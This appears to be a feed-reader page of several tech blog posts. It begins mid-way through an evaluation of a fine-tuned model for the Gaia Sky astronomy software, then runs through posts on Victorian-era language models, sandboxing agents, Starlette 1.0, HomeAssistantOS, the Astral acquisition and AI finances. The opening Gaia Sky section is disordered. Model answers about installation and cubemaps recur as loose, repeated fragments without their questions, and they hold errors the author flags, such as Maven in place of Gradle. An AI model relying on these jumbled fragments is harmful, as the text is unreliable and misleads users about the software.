Dependencies: Ensure your system has up-to-date OpenGL drivers and Java (JDK 17+ is recommended). The AUR package typically handles these automatically.

Data Location: By default, datasets are stored in a default location. You may want to create symbolic links if you prefer system-wide data management. Ensure you have at least 4GB of free disk space for datasets and cache files. For GPU acceleration, verify that your graphics drivers support OpenGL 4.3+.

Very good response. It recommends using the AUR package (correct), and also provides instructions to build and run it from source (also correct). However, it hallucinates the use of Maven instead of Gradle. The base model produced a long wall of text with mostly nonsense that would look plausible to the non-expert. In general, the responses from the base model were much longer and their content was very often factually wrong. The next question is a bit more technical.

Q: How are cubemap textures used in Gaia Sky?

A: Cubemaps in Gaia Sky serve a specific purpose related to planetary rendering rather than general environment mapping for the entire scene.
They are primarily utilized to generate high-resolution, seamless spherical textures for planets (like Earth or Mars) by stitching together six square faces into a continuous surface. This technique allows for detailed texture representation without the distortion often seen in standard equirectangular projections near poles. Key technical details:

Application: Used specifically for planet textures where high fidelity is required across all latitudes and longitudes.

Structure: Consists of six square images (front, back, left, right, top, bottom) that are algorithmically mapped onto a sphere.

Rendering Engine: The underlying rendering engine uses these cubemap textures to apply surface details dynamically as the planet rotates or changes perspective.

This feature is distinct from standard environment maps used for sky reflections or star glow effects, focusing instead on accurate planetary visualization.

This is excellent, even though it seems to imply that cubemaps are not used for environment maps and reflections, which is incorrect. However, it correctly identifies that they are mainly used to avoid distortions at the poles. Maybe the model overweighted this because there is an entire documentation section devoted to cubemap textures in planets. The base model produced a long, Markdown-formatted, pretentious output that even included totally made-up scripts. Again, the fine-tuned response was much more grounded and correct.

Now, onto the scripting questions. Here is where the fine-tuned model starts to hesitate and invent slightly. Here are the possible reasons:

Low parameter count not being able to retain the information properly.

Very low number of test and showcase scripts used in fine-tuning.

Bad design of the training dataset.

I personally think it has more to do with the first two reasons than the third.

Q: How do I get the camera position with the APIv1 and scripting in Gaia Sky?

A: To retrieve the current camera position using the Legacy API (v1), you call the method it names; for the Modern Component API (v2), you use the corresponding call from the camera module.

First, it invented a method name that does not exist in APIv1. For APIv2, it correctly used the camera module, but the way it gets the object is incorrect. So, I think either this model is too small to be effectively fine-tuned for Gaia Sky scripting, or the training dataset is insufficient for reliable retention. It could also be both, as I said above. The base model has no idea about Gaia Sky scripting or anything related to it, so it just makes stuff up. Not even worth further mention.

I used the Laptop 2 described above for testing and inference, with 28/32 layers on the GPU and a context window of ~4k, and I consistently got about 12 tok/s. Performance is exactly the same as with the base models, so this section is short.

This fine-tuning experiment has yielded valuable insights into the strengths and limitations of domain-specific model adaptation at lower parameter counts for local use. I think the foundational approach was sound. The dataset curation process, with its surgical filtering, teacher-based distillation, and rigorous sanitization, successfully encoded domain knowledge into the model. Proof of this is evident in the testing: the fine-tuned model, as opposed to the base one, correctly answered conceptual and documentation-heavy questions about Gaia Sky’s purpose, installation, and rendering techniques without hallucinating. It understood architectural details like LOD and cubemaps, and avoided inventing features that don’t exist. This demonstrates that fine-tuning can be an effective alternative to RAG for teaching models about a specific domain. However, it also struggled. The 9B model hit a hard ceiling when it came to API scripting and method names. It invented a nonexistent method, misunderstood how to instantiate APIv2 objects, and generally lacked the capacity to reliably retain the specific, syntactic details of the API surface. This is a classic problem: smaller models can absorb concepts and documentation, but struggle to memorize exact function signatures and usage patterns.
With only 3,800+ training pairs and a 9B parameter budget, the model simply didn’t have enough capacity to encode both general knowledge and precise API details. So, what are the next steps? I believe the 4B and 9B models are too small for reliable Gaia Sky scripting assistance. My next experiment will be to fine-tune the Qwen 3.5 27B model. The jump from 9B to 27B parameters should provide substantially more capacity to encode API signatures without sacrificing general knowledge. Additionally, I could increase the scripting dataset by:

Expanding the test and showcase scripts used in Type D training.

Generating more synthetic scripting examples in Type A (API reference) with better coverage of edge cases and parameter variations.

Adding adversarial examples (Type C) for the most commonly confused API patterns.

That said, the hardware constraint is real. 27B requires more than my RTX 5080 can reasonably handle for full fine-tuning. However, with careful quantization (using 8-bit optimizers or even lower precision), 4-bit LoRA, and possibly gradient checkpointing, it may fit. If not, a cloud provider like Lambda Labs or Paperspace might be the way forward for a single training run. All in all, I think fine-tuning is a viable path for building domain-expert models, but it requires the right balance of dataset quality, model size, and hardware. For Gaia Sky specifically, a 27B model with a more robust scripting dataset would likely be the sweet spot before considering the jump to 70B+ models. I consider the infrastructure proven. It’s now a matter of scale.
Interactive Exploration: Navigate the Milky Way, explore exoplanets, view the solar system in high detail, and time-travel through cosmic history using an intuitive interface.
Scientific Visualization: Visualize complex astrophysical datasets (catalogs, simulations) with advanced rendering techniques like LOD (Level of Detail), shaders, and particle effects.
Education & Outreach: Create immersive presentations or tutorials to teach astronomy concepts through dynamic 3D models of celestial objects.
Scripting & Automation: Automate camera paths, data loading, and scene manipulation via Python (Modern API v2) or Java for reproducible workflows and research presentations.
Data Analysis: Load and manipulate large-scale astronomical datasets directly within the application to analyze spatial distributions without external tools.

Download the Installer: Visit https://gaiasky.space/download and download the package for your architecture.
Install via Package Manager: Open a terminal and run the installer; if dependency errors occur, fix the broken dependencies first.
Launch Gaia Sky: Run the launch command. The application will start in your default browser or terminal window.

Install via AUR Helper: Open your terminal and run your AUR helper. This will automatically resolve dependencies (Java, OpenGL libraries) and install the application.
Verify Installation: Once installed, launch it from the command line.

Clone the Repository, then Build and Install: Use Maven to build the project (requires a Java Development Kit). After building, you can run it directly from the build directory or install it using the provided Gradle wrapper if available in newer versions.
Dependencies: Ensure your system has up-to-date OpenGL drivers and Java (JDK 17+ is recommended). The AUR package typically handles these automatically.
Data Location: Datasets are stored in a default data directory; you may want to create symbolic links if you prefer system-wide data management. Ensure you have at least 4GB of free disk space for datasets and cache files. For GPU acceleration, verify that your graphics drivers support OpenGL 4.3+.

Application: Used specifically for planet textures where high fidelity is required across all latitudes and longitudes.
Structure: Consists of six square images (front, back, left, right, top, bottom) that are algorithmically mapped onto a sphere.
Rendering Engine: The underlying rendering engine uses these cubemap textures to apply surface details dynamically as the planet rotates or changes perspective.

As for why the scripting results fell short, the likely culprits are:
Low parameter count not being able to retain the information properly.
Very low number of test and showcase scripts used in fine-tuning.
Bad design of the training dataset.
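To make the Type C idea concrete, here is a minimal sketch of programmatically corrupting a known-good call to produce a (broken, fixed) training pair. The API call shown is a placeholder, not necessarily a real Gaia Sky function:

```python
# Minimal sketch of Type C adversarial pair generation: corrupt a correct
# call, keep the original as the fix. The API name below is a placeholder.
import random

def make_adversarial_pair(good_call: str, required_arg: str) -> dict:
    corruptions = [
        lambda s: s.replace("_", ""),           # wrong naming convention
        lambda s: s.replace(required_arg, ""),  # drop a required argument
    ]
    broken = random.choice(corruptions)(good_call)
    return {"broken": broken, "fixed": good_call}

print(make_adversarial_pair('gs.go_to_object("Mars")', '"Mars"'))
```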

Evan Hahn 2 weeks ago

Notes from March 2026

March always seems to be my life’s busiest month.

“The two kinds of error”: in my mind, software errors are divided into two categories: expected and unexpected errors. I finally wrote up this idea I’ve had for a long time.
“All tests pass” is a short story about a strange, and sorta sad, experience I had with a coding agent.
Inspired by others, I published a disclaimer about how I use generative AI to write this blog. My main rule of thumb: the final product must be word-for-word what I would’ve written without AI, given enough time. And I have discomfort about its use.
Built llm-eliza, a plugin for LLM that lets you use the ELIZA chatbot at the command line. I think this is my first satirical software project. (Also the first thing I’ve published to the Python package registry, PyPI.)
Found the human.json standard, which is “a protocol for humans to assert authorship of their site content and vouch for the humanity of others.” I added it to my site this month.
Scraped Rosetta Code and built a stupid little website that picks a random programming language.
At work, I helped with a project to improve the editor for Ghost’s “welcome emails” feature.
This month marked the one year anniversary of my first post on Zelda Dungeon. I celebrated by writing more articles, including a treatise on the difference between 2D and 3D games and a personal piece about Ocarina of Time. I also wrote my first article that contained an interview, which was a skill I’m totally new to.
It’s a small change, but I fixed a little bug in fzf.

From a tale about vibe coding: “I’d be embarrassed to show it at a code review. I’d also be embarrassed to admit how many times I failed to ship the ‘clean’ version.”
“Claude is the only AI model that has actually been deployed inside classified [American] military systems. So to the extent that AI is having an effect in Iran, it is probably Claude.” From a Hard Fork podcast episode.
From “AI’s Enthusiasm Chasm”: “people—well, again, most people—don’t enjoy existing in a strict state of quantification. Pursuits and pastimes—joy—are underpinned by qualitative thought, and those considerations make people less likely to want to involve AI just to get something at a tenth of the cost or five times faster.”
“The Cognitive Dark Forest” posits that AI forces us, socially, to close down the open web.
“The sheer act of thinking outside the box makes the box bigger.” This post has a good—if incomplete—list of all the downsides of generative AI: perpetuation of bias, erosion of critical thinking, harm to artists, and more.
Uber used to be inexpensive because it was subsidized by VC money. Now it’s more costly because they needed to stop losing money. “Don’t get used to cheap AI” posits that the same will happen with AI. Similar ideas are presented in “Is the Future of AI Local?”.
From “It’s time to embrace climate conspiracy”: “the actual story of climate change—the one we’ve reported exhaustively—is one about coordinated power, deliberate deception, and a bought-off government that repeatedly acts to promote an industry that is poisoning humans and the environment for profit. It just so happens to be a real conspiracy.”
Really liked this short piece about what’s lost when new technology becomes commonplace. Few people today remember what we lost when we switched from candles to lightbulbs.
“we don’t need more ram, we need better software” had me whispering “hell yeah” to myself.
I’ve long pondered a blog post called “Why I’m afraid of YAML”.
This post from a former colleague says it better than I ever could.
“Costs of War” highlights the costs, financial and otherwise, of the United States’s wars.
The US FBI is buying location data for surveillance, as is our Secret Service.
This review of the new Marathon shooter game was surprisingly poignant. “It’s just thoughts and if I don’t get them out, my tummy hurts.”
As a Legend of Zelda fan and programmer, I was happy to discover YouTuber Skawo. Their videos explain Zelda quirks by delving into real source code. I especially liked this explanation of why some players were experiencing rumble in a game that shouldn’t have it.
The US effectively bans foreign-made routers.

Hope you had a good March.

Simon Willison 2 weeks ago

Mr. Chatterbox is a (weak) Victorian-era ethically trained model you can run on your own computer

Trip Venturella released Mr. Chatterbox, a language model trained entirely on out-of-copyright text from the British Library. Here’s how he describes it:

Mr. Chatterbox is a language model trained entirely from scratch on a corpus of over 28,000 Victorian-era British texts published between 1837 and 1899, drawn from a dataset made available by the British Library. The model has absolutely no training inputs from after 1899 — the vocabulary and ideas are formed exclusively from nineteenth-century literature.

Mr. Chatterbox’s training corpus was 28,035 books, with an estimated 2.93 billion input tokens after filtering. The model has roughly 340 million parameters, roughly the same size as GPT-2-Medium. The difference is, of course, that unlike GPT-2, Mr. Chatterbox is trained entirely on historical data.

Given how hard it is to train a useful LLM without using vast amounts of scraped, unlicensed data, I’ve been dreaming of a model like this for a couple of years now. What would a model trained on out-of-copyright text be like to chat with? Thanks to Trip we can now find out for ourselves!

The model itself is tiny, at least by Large Language Model standards - just 2.05GB on disk. You can try it out using Trip’s HuggingFace Spaces demo.

Honestly, it’s pretty terrible. Talking with it feels more like chatting with a Markov chain than an LLM - the responses may have a delightfully Victorian flavor to them but it’s hard to get a response that usefully answers a question.

The 2022 Chinchilla paper suggests a ratio of 20 training tokens per parameter. For a 340m model that would suggest around 7 billion tokens, more than twice the British Library corpus used here. The smallest Qwen 3.5 model is 600m parameters and that model family starts to get interesting at 2b - so my hunch is we would need 4x or more the training data to get something that starts to feel like a useful conversational partner. But what a fun project!

I decided to see if I could run the model on my own machine using my LLM framework. I got Claude Code to do most of the work - here’s the transcript. Trip trained the model using Andrej Karpathy’s nanochat, so I cloned that project, pulled the model weights and told Claude to build a Python script to run the model. Once we had that working (which ended up needing some extra details from the Space demo source code) I had Claude read the LLM plugin tutorial and build the rest of the plugin.

llm-mrchatterbox is the result. Install the plugin with LLM’s plugin installer; the first time you run a prompt it will fetch the 2.05GB model file from Hugging Face. You can run one-off prompts or start an ongoing chat session, and if you don’t have LLM installed you can still get a chat session started from scratch using uvx. When you are finished with the model you can delete the cached file.

This is the first time I’ve had Claude Code build a full LLM model plugin from scratch and it worked really well. I expect I’ll be using this method again in the future.

I continue to hope we can get a useful model from entirely public domain data. The fact that Trip was able to get this far using nanochat and 2.93 billion training tokens is a promising start.
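For reference, here is roughly what driving the plugin looks like via LLM’s Python API rather than the CLI. The model ID “mrchatterbox” is my assumption based on the plugin name:

```python
# Sketch of using the plugin through LLM's Python API.
# Assumes the llm-mrchatterbox plugin is installed; the model ID is a guess.
import llm

model = llm.get_model("mrchatterbox")
response = model.prompt("Pray, what news of the railways?")
print(response.text())
```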

blog.philz.dev 2 weeks ago

computing 2+2: so many sandboxes

Sandboxes are so in right now. If you're doing agentic stuff, you've no doubt thought about what Simon Willison calls the lethal trifecta: private data, untrusted content, and external communication. If you work in a VM, for example, you can avoid putting a secret on that VM, and then that secret--that's not there!--can't be exfiltrated. If you want to deal with untrusted data, you can also cut off external communication. You can still use an agent, but you need to either limit its network access or limit its tools. So, today's task is to compute 2+2 five ways.

Cloud Hypervisor is a Virtual Machine Monitor which runs on top of the Linux kernel's KVM (Kernel-based Virtual Machine), which runs on top of CPUs that support virtualization. A cloud-hypervisor VM sorta looks like a process on the host (and can be managed with cgroups, for example), but it's running a full Linux kernel. With the appropriate kernel options, you can run Docker containers, do tricky networking things, nested virtualization, and so on. Lineage-wise, it's in the same family as Firecracker and crosvm. It avoids implementing floppy devices and tries to be pretty small. Traditionally, people tell you to unpack a file system and maybe make a vinyl out of it using an iso image or some such. A trick is to instead start with a container image for your userspace, and then you get all the niceties (and all the warts) of Docker. Takes about 2 seconds.

gVisor implements a large chunk of the Linux syscall interface in a Go process. Think of it as a userland kernel. It came out of Google's AppEngine work. It can use systrap/seccomp, ptrace, and KVM tricks to do the interception. The downside of gVisor is that you can't do some things inside of it. For example, you can't run vanilla Docker inside of gVisor because it doesn't support Docker's networking tricks. Again, let's use Docker to get ourselves a userland. No need for a kernel image. runsc stands for "run secure container."

Monty is a Python interpreter written in Rust. It doesn't expose the host, but can call functions that are explicitly exposed. This one's super fast.

Pyodide is CPython compiled to WebAssembly. Deno is a JS runtime with permission-based security. Deno happens to run wasm code fine, so we're using it as a wasm runtime. There are other choices.

Chromium is probably the world's most popular sandbox. This is pretty much the same as Deno: it's the V8 interpreter under the hood. Lots of ways to drive Chromium. Puppeteer, headless, etc.

Let's try rodney: Run pyodide inside Deno inside gVisor inside cloud-hypervisor. Setting up the networking and the file system/disk sharing for these things is usually not trivial, especially if you don't want to accidentally expose the VMs to each other, and so forth.

I want to compare two possible agents: a coding agent and a logs agent. A coding agent needs a full Linux, because, at the end of the day, it needs to edit files and run tests and operate git. Your sandboxing options are going to end up being a VM or a container of some sort. A logs agent needs access to your logs (say, the ability to run readonly queries on Clickhouse) and it needs to be able to send you its output. In the minimal case, it doesn't need any sandboxing at all, since it doesn't have access to anything. If you want it to be able to produce a graph, however, it will need to write out a file. At the minimum, it will need to take the results of its queries and pair them with an HTML file that has some JS that renders them with Vegalite.
You might also want to mix and match the results of multiple queries, and do some data munging outside of SQL. This is all where a setup like Monty or Pyodide comes in handy. Giving the agent access to some Python expands considerably how much the agent can do, and you can do it cheaply and safely with these sandboxes. In this vein, if you use DSPy for RLM, its implementation gives the LLM the Deno/pyodide solution to let the LLM have "infinite" context.

Browser-based agents are a thing too. Itsy-Bitsy is a bookmarklet-based agent. It runs in the context of the web page it's operating on.

Let me know what other systems I missed!
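As a concrete baseline, here is a minimal sketch of two of the five ways: computing 2+2 in a plain Docker container, then under gVisor. It assumes Docker is installed and gVisor's runsc runtime has been registered with Docker:

```python
# Compute 2+2 in an ordinary container, then under gVisor's userland kernel.
# Assumes Docker plus a registered runsc runtime.
import subprocess

def compute(runtime_args):
    cmd = ["docker", "run", "--rm", *runtime_args,
           "python:3.12-slim", "python", "-c", "print(2+2)"]
    return subprocess.run(cmd, capture_output=True, text=True).stdout.strip()

print(compute([]))                   # ordinary runc container
print(compute(["--runtime=runsc"]))  # same image, intercepted by gVisor
```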


SQLAlchemy 2 In Practice - Chapter 2 - Database Tables

This is the second chapter of my SQLAlchemy 2 in Practice book. If you'd like to support my work, I encourage you to buy this book, either directly from my store or on Amazon . Thank you! This chapter provides an overview of the most basic usage of the SQLAlchemy library to create, update and query database tables.
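For a flavor of what the chapter covers, here is a minimal SQLAlchemy 2.0-style example of defining, creating, and querying a table. The model and database URL are illustrative, not taken from the book:

```python
# Minimal SQLAlchemy 2.0 declarative example: define, create, insert, query.
from sqlalchemy import String, create_engine, select
from sqlalchemy.orm import DeclarativeBase, Mapped, Session, mapped_column

class Base(DeclarativeBase):
    pass

class Product(Base):
    __tablename__ = "products"
    id: Mapped[int] = mapped_column(primary_key=True)
    name: Mapped[str] = mapped_column(String(64))

engine = create_engine("sqlite:///practice.db")
Base.metadata.create_all(engine)

with Session(engine) as session:
    session.add(Product(name="widget"))
    session.commit()
    for product in session.scalars(select(Product)):
        print(product.id, product.name)
```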

Simon Willison 3 weeks ago

Experimenting with Starlette 1.0 with Claude skills

Starlette 1.0 is out! This is a really big deal. I think Starlette may be the Python framework with the most usage compared to its relatively low brand recognition, because Starlette is the foundation of FastAPI, which has attracted a huge amount of buzz that seems to have overshadowed Starlette itself.

Kim Christie started working on Starlette in 2018 and it quickly became my favorite out of the new breed of Python ASGI frameworks. The only reason I didn't use it as the basis for my own Datasette project was that it didn't yet promise stability, and I was determined to provide a stable API for Datasette's own plugins... albeit I still haven't been brave enough to ship my own 1.0 release (after 26 alphas and counting)!

Then in September 2025 Marcelo Trylesinski announced that Starlette and Uvicorn were transferring to their GitHub account, in recognition of their many years of contributions and to make it easier for them to receive sponsorship against those projects.

The 1.0 version has a few breaking changes compared to the 0.x series, described in the release notes for 1.0.0rc1 that came out in February. The most notable of these is a change to how code runs on startup and shutdown. Previously that was handled by on_startup and on_shutdown parameters, but the new system uses a neat lifespan mechanism instead, based around an async context manager.

If you haven't tried Starlette before it feels to me like an asyncio-native cross between Flask and Django, unsurprising since creator Kim Christie is also responsible for Django REST Framework. Crucially, this means you can write most apps as a single Python file, Flask style. This makes it really easy for LLMs to spit out a working Starlette app from a single prompt.

There's just one problem there: if 1.0 breaks compatibility with the Starlette code that the models have been trained on, how can we have them generate code that works with 1.0?

I decided to see if I could get this working with a Skill. Regular Claude Chat on claude.ai has skills, and one of those default skills is the skill-creator skill. This means Claude knows how to build its own skills. So I started a chat session and told it:

Clone Starlette from GitHub - it just had its 1.0 release. Build a skill markdown document for this release which includes code examples of every feature.

I didn't even tell it where to find the repo; Starlette is widely enough known that I expected it could find it on its own. The clone command it ran used the old repository name, but GitHub handles redirects automatically so this worked just fine.

The resulting skill document looked very thorough to me... and then I noticed a new button at the top I hadn't seen before labelled "Copy to your skills". So I clicked it. And now my regular Claude chat has access to that skill! I started a new conversation and prompted:

Build a task management app with Starlette, it should have projects and tasks and comments and labels

And Claude did exactly that, producing a simple GitHub Issues clone using Starlette 1.0, a SQLite database (via aiosqlite) and a Jinja2 template. Claude even tested the app manually.

For all of the buzz about Claude Code, it's easy to overlook that Claude itself counts as a coding agent now, fully able to both write and then test the code that it is writing. Here's what the resulting app looked like. The code is here in my research repository.
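For reference, the new lifespan mechanism mentioned above looks roughly like this, based on Starlette's documented async context manager API; the route and handler are illustrative:

```python
# Sketch of Starlette's lifespan mechanism: startup code runs before the
# yield, shutdown code after.
import contextlib

from starlette.applications import Starlette
from starlette.responses import PlainTextResponse
from starlette.routing import Route

@contextlib.asynccontextmanager
async def lifespan(app):
    print("startup: open pools, warm caches")
    yield
    print("shutdown: close connections")

async def homepage(request):
    return PlainTextResponse("hello")

app = Starlette(routes=[Route("/", homepage)], lifespan=lifespan)
```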

neilzone 3 weeks ago

Moving (for now?) from HomeAssistant in Python venvs to HomeAssistantOS

I have used HomeAssistant for years. So many years, that I do not remember how many. Nothing I do with it is particularly fancy, but things like having my office lights turn on when I open the door if the light is below a certain luminosity, or turning off my Brompton bike charger once it has finished charging, are fun and convenient. We also have solar panels and a battery now, so I will be interested to see if I use HomeAssistant more for that.

But anyway. I have been using HomeAssistant, on a Raspberry Pi 4, using Python venvs for years. It has worked absolutely fine for me, and I have (or, at least, had) no compelling reason to change. For me, this was the ideal setup, in that I could set the Pi up how I wanted, in terms of security and monitoring, and just run HomeAssistant on it. Updating HomeAssistant was as easy as running a simple bash script. I liked it.

But… that approach is no longer supported, and, where possible, I prefer to use supported means of running software. That means either running HomeAssistantOS, or else using a containerised instance of HomeAssistant. While I could probably find my way through setting up a HomeAssistant container via podman, it would not be my preference, so I decided to give HomeAssistantOS a go, albeit with some trepidation.

As expected, it was easy to install HAOS: write the image to a microSD card, and pop it into the Pi. I already had the switch port set up to the right VLAN, so I plugged in the Pi and waited a few minutes. I had anticipated that it would offer https, via a self-signed certificate, so I was a bit baffled to get a TLS error when I connected to it. “Never mind”, I thought. “I’ll just ssh into it and sort it out.” But no, no ssh either. Fortunately, I discovered quite quickly that, out of the box, it does not offer TLS, and I was able to access the web interface.

I had taken a backup from my existing HomeAssistant installation, and I used the web interface on the new installation to restore it. It took a few minutes, but restored absolutely everything. I was impressed.

I was anticipating - indeed, hoping - to set up TLS and reverse proxying using certbot and nginx. But that is not possible. Instead, I achieved it (reasonably easily, but not as easily as using a command line) via Add-ons from within the HomeAssistant UI. I’d have preferred to do it the normal way, via ssh, but oh well.

Annoyingly, I’d also like to have configured a firewall on the machine, but that is not an option either. I’ve yet to determine if that is going to be a dealbreaker for me, or whether relying on the network-level firewall, controlling access to and from that VLAN, and that machine, will be sufficient.

I have also not been able to set up a separate ssh account for my greenbone scanning software, or to configure Wazuh to get the machine talking to my SIEM. Again, I will need to consider the impact of this, but intuitively it does not sit comfortably with me.

Nor can I find a way to use restic to back up the configuration and other bits, incrementally and automatically, onto another machine, like I am used to doing. I will have a poke around with the backup tooling offered but again, this does not enthral me. I want to know that, if there’s a problem, I have a backup on my restic server.

Since I have used HomeAssistant for so long, and since I just restored a backup, the most I can say really is that it is all still working. It doesn’t seem faster or slower.
The limitations of the appliance-based approach are annoying me, and may be sufficient to drive me towards a container-based approach instead (although that does not appeal to me either). Ultimately, I accept that I am but one user, and perhaps many users do not want the things that I want. Importantly, I am not the developer, and so what I want may simply not be things that they wish to provide. And that is their choice. I guess - personal opinion - that I would prefer a computer and not an appliance.


SQLAlchemy 2 In Practice - Chapter 1 - Database Setup

Welcome! This is the start of a journey which I hope will provide you with many new tricks to improve how you work with relational databases in your Python applications. Given that this is a hands-on book, this first chapter is dedicated to help you set up your system with a database, so that you can run all the examples and exercises. This is the first chapter of my SQLAlchemy 2 in Practice book. If you'd like to support my work, I encourage you to buy this book, either directly from my store or on Amazon . Thank you!
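As a quick sanity check of the kind this setup chapter enables, here is a minimal connection test; the SQLite URL is an assumption (the book may use a different database):

```python
# Minimal connectivity check: create an engine and run a trivial query.
from sqlalchemy import create_engine, text

engine = create_engine("sqlite:///practice.db", echo=True)
with engine.connect() as conn:
    print(conn.execute(text("SELECT 1")).scalar())  # prints 1 if all is well
```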

Simon Willison 3 weeks ago

Thoughts on OpenAI acquiring Astral and uv/ruff/ty

The big news this morning: Astral to join OpenAI (on the Astral blog) and OpenAI to acquire Astral (the OpenAI announcement). Astral are the company behind uv, ruff, and ty - three increasingly load-bearing open source projects in the Python ecosystem. I have thoughts!

The Astral team will become part of the Codex team at OpenAI. Charlie Marsh has this to say:

Open source is at the heart of that impact and the heart of that story; it sits at the center of everything we do. In line with our philosophy and OpenAI's own announcement, OpenAI will continue supporting our open source tools after the deal closes. We'll keep building in the open, alongside our community -- and for the broader Python ecosystem -- just as we have from the start. [...] After joining the Codex team, we'll continue building our open source tools, explore ways they can work more seamlessly with Codex, and expand our reach to think more broadly about the future of software development.

OpenAI's message has a slightly different focus (highlights mine):

As part of our developer-first philosophy, after closing OpenAI plans to support Astral’s open source products. By bringing Astral’s tooling and engineering expertise to OpenAI, we will accelerate our work on Codex and expand what AI can do across the software development lifecycle.

This is a slightly confusing message. The Codex CLI is a Rust application, and Astral have some of the best Rust engineers in the industry - BurntSushi alone (Rust regex, ripgrep, jiff) may be worth the price of acquisition! So is this about the talent or about the product? I expect both, but I know from past experience that a product+talent acquisition can turn into a talent-only acquisition later on.

Of Astral's projects the most impactful by far is uv. If you're not familiar with it, uv is by far the most convincing solution to Python's environment management problems, best illustrated by this classic XKCD. Switch from pip to uv and most of these problems go away. I've been using it extensively for the past couple of years and it's become an essential part of my workflow. I'm not alone in this. According to PyPI Stats uv was downloaded more than 126 million times last month! Since its release in February 2024 - just two years ago - it's become one of the most popular tools for running Python code.

Astral's two other big projects are ruff - a Python linter and formatter - and ty - a fast Python type checker. These are popular tools that provide a great developer experience, but they aren't load-bearing in the same way that uv is. They do however resonate well with coding agent tools like Codex - giving an agent access to fast linting and type checking tools can help improve the quality of the code they generate. I'm not convinced that integrating them into the coding agent itself, as opposed to telling it when to run them, will make a meaningful difference, but I may just not be imaginative enough here.

Ever since uv started to gain traction the Python community has been worrying about the strategic risk of a single VC-backed company owning a key piece of Python infrastructure. I wrote about one of those conversations in detail back in September 2024. The conversation back then focused on what Astral's business plan could be, which started to take form in August 2025 when they announced pyx, their private PyPI-style package registry for organizations. I'm less convinced that pyx makes sense within OpenAI, and it's notably absent from both the Astral and OpenAI announcement posts.
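One concrete example of why uv has become so load-bearing: it can run a single-file script with PEP 723 inline metadata, creating a throwaway environment on the fly. The script below is illustrative:

```python
# /// script
# requires-python = ">=3.12"
# dependencies = ["requests"]
# ///
# Run with: uv run fetch.py (uv resolves and installs the deps on the fly).
import requests

print(requests.get("https://astral.sh").status_code)
```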
An interesting aspect of this deal is how it might impact the competition between Anthropic and OpenAI. Both companies spent most of 2025 focused on improving the coding ability of their models, resulting in the November 2025 inflection point when coding agents went from often-useful to almost-indispensable tools for software development. The competition between Anthropic's Claude Code and OpenAI's Codex is fierce. Those $200/month subscriptions add up to billions of dollars a year in revenue, for companies that very much need that money.

Anthropic acquired the Bun JavaScript runtime in December 2025, an acquisition that looks somewhat similar in shape to Astral. Bun was already a core component of Claude Code and that acquisition looked to mainly be about ensuring that a crucial dependency stayed actively maintained. Claude Code's performance has increased significantly since then thanks to the efforts of Bun's Jarred Sumner.

One bad version of this deal would be if OpenAI start using their ownership of uv as leverage in their competition with Anthropic.

One detail that caught my eye from Astral's announcement, in the section thanking the team, investors, and community:

Second, to our investors, especially Casey Aylward from Accel, who led our Seed and Series A, and Jennifer Li from Andreessen Horowitz, who led our Series B. As a first-time, technical, solo founder, you showed far more belief in me than I ever showed in myself, and I will never forget that.

As far as I can tell neither the Series A nor the Series B were previously announced - I've only been able to find coverage of the original seed round from April 2023. Those investors presumably now get to exchange their stake in Astral for a piece of OpenAI. I wonder how much influence they had on Astral's decision to sell.

Armin Ronacher built Rye, which was later taken over by Astral and effectively merged with uv. In August 2024 he wrote about the risk involved in a VC-backed company owning a key piece of open source infrastructure and said the following (highlight mine):

However having seen the code and what uv is doing, even in the worst possible future this is a very forkable and maintainable thing. I believe that even in case Astral shuts down or were to do something incredibly dodgy licensing wise, the community would be better off than before uv existed.

Astral's own Douglas Creager emphasized this angle on Hacker News today:

All I can say is that right now, we're committed to maintaining our open-source tools with the same level of effort, care, and attention to detail as before. That does not change with this acquisition. No one can guarantee how motives, incentives, and decisions might change years down the line. But that's why we bake optionality into it with the tools being permissively licensed. That makes the worst-case scenarios have the shape of "fork and move on", and not "software disappears forever".

I like and trust the Astral team and I'm optimistic that their projects will be well-maintained in their new home. OpenAI don't yet have much of a track record with respect to acquiring and maintaining open source projects. They've been on a bit of an acquisition spree over the past three months though, snapping up Promptfoo and OpenClaw (sort-of, they hired creator Peter Steinberger and are spinning OpenClaw off to a foundation), plus closed source LaTeX platform Crixet (now Prism). If things do go south for uv and the other Astral projects we'll get to see how credible the forking exit strategy turns out to be.


Why Are We Still Doing This?

Hi! If you like this piece and want to support my work, please subscribe to my premium newsletter. It’s $70 a year, or $7 a month, and in return you get a weekly newsletter that’s usually anywhere from 5,000 to 18,000 words, including vast, extremely detailed analyses of NVIDIA, Anthropic and OpenAI’s finances, and the AI bubble writ large.

I just put out a massive Hater’s Guide To The SaaSpocalypse — an urgent and in-depth analysis of the end of the hypergrowth era of software — and my Hater’s Guides To Private Equity, Anthropic, Oracle and Microsoft are huge (12k+ word) research projects priced lower than the cost of a cup of coffee, which is partly an inflation issue on the part of the coffee shop, but what I’m getting at is this is a ton of value.

Where’s Your Ed At Premium is incredibly useful, read by hedge funds, private equity firms, Fortune 500 CEOs, a large chunk of the business and tech media, and quite a few CEOs of major tech firms. I am regularly several steps ahead in my coverage, and you get an absolute ton of value, several books’ worth of content a year. Subscribe today and support my work, I deeply appreciate it.

Hey everyone! I know everybody is super excited about the supposed power of AI, but I think it’s time we set some fair ground rules going forward so we stop acting so crazy.

Let’s start with a simple one: AI boosters are no longer allowed to explain what’s good about AI using the future tense. You can no longer say “it will,” “could,” “might,” “likely,” “possible,” “estimated,” “promise,” or any other term that reviews today’s capabilities in the language of the future.

I am constantly asked to explain my opinions (not that anybody who disagrees with me actually reads them) in the terms of the present, I am constantly harangued for proof of what I believe, and every time I hand it over there’s some sort of ham-fisted response of “it’s getting better” and “it will get even more better from here!”

That’s no longer permissible! I am no longer accepting any arguments that tell me something will happen, or that “things are trending” in a certain way. For an industry so thoroughly steeped in cold, hard rationality, AI boosters are so quick to jump to flights of fancy — to speak of the mythical “AGI” and the supposed moment when everything gets cheaper and also powerful enough to be reliable or effective.

I hear all this crap about AI changing everything, but where’s the proof?

Wow. Anthropic managed to turn $30 billion into $5 billion and start one of the single most annoying debates in internet history. No, really: its CFO Krishna Rao stated on March 9, 2026 in a legal filing that it had made revenue “exceeding” $5 billion and spent “over” $10 billion on inference and training. None of these numbers line up with previous statements about annualized revenue, by the way — I went into this last week — and no amount of contorting around the meaning of “exceeding” takes away from the fact that adding up all the annualized revenues is over $6 billion, which I believe means that Anthropic defines “annualized” in a new and innovative way.

In any case, Anthropic turned $30 billion into $5 billion. That’s…bad. That’s just bad business. And I hear no compelling argument as to how this might improve, other than “these companies need more compute, and then something will happen.” In fact, let’s talk about that for a second.
